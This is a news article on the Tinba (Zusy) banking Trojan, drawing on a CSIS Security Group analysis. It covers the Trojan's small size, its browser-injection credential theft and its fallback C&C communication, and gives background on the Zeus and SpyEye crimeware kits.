Tinba, a newly discovered banking Trojan, has been detected in man-in-the-browser attacks, circumventing two-factor authentication to steal sensitive data, including credit card information from Internet Explorer and Firefox users.
Tinba is the smallest Trojan banker we have ever encountered and it belongs to a complete new family of malware that we expect to be battling in upcoming months.
Peter Kruse, partner and security analyst, CISIS Security Group A/S
Tinba, also known as Zusy was analyzed by Danish security firm CSIS Security Group A/S, and is gaining interest from malware analysts because of its lightweight size. Its code is 20 kilobytes, giving it the ability to slip past detection by some antivirus engines, infecting systems without advanced encryption.
“It hooks into browsers and steals login data and sniffs on network traffic,” wrote Peter Kruse, partner and security analyst at CISIS, in a blog post describing the Tinba analysis.
The cybercriminals behind the malware have used it in limited attacks, trying to keep it from being detected by security researchers for as long as possible. “Tinba, like its equals, targets financial websites, but only a very small list of specific URLs,” Kruse wrote. The firm declined to list the financial websites used in the attacks.
The attackers target users of Microsoft Windows. Some Tinba components share similarities with the notorious Zeus malware family. It injects code into the browser, enabling it to steal account credentials, credit card data or other authentication information.
“Tinba is the smallest Trojan banker we have ever encountered and it belongs to a complete new family of malware that we expect to be battling in upcoming months,” Kruse wrote.
The CSIS researchers found that the Tinba Trojan attempted to communicate with four command-and-control (C&C) domains using a standard RC4 encryption algorithm. “This is done to avoid one domain from being nonresponsive and thus losing communication with its drones. If the first domain does not respond properly, Tinba simply moves on to the next domain down the chain,” Kruse wrote.
CSIS blocked access to all the known Tinba C&C servers, according to Kruse.
Banking Trojans have been tormenting the financial industry for years. Attacks have been fueled by the easy availability of the Zeus crimeware kit. Attackers have been targeting the customers of financial firms that offer online banking, and trick the user by either spoofing a website, or injecting code to sniff network traffic, stealing sensitive account credentials. Ultimately, cybercriminals attempt to drain the accounts of their victims. Banking malware can spread via phony emails that spoof a known financial website.
More recently, the SpyEye exploit toolkit has been a problem. The source code of both the SpyEye and the Zeus toolkits leaked, enabling savvy cybercriminals to create variants using versions of both malware families. SpyEye and Zeus are known for duping transaction monitoring systems designed to detect anomalies that could signal a red flag.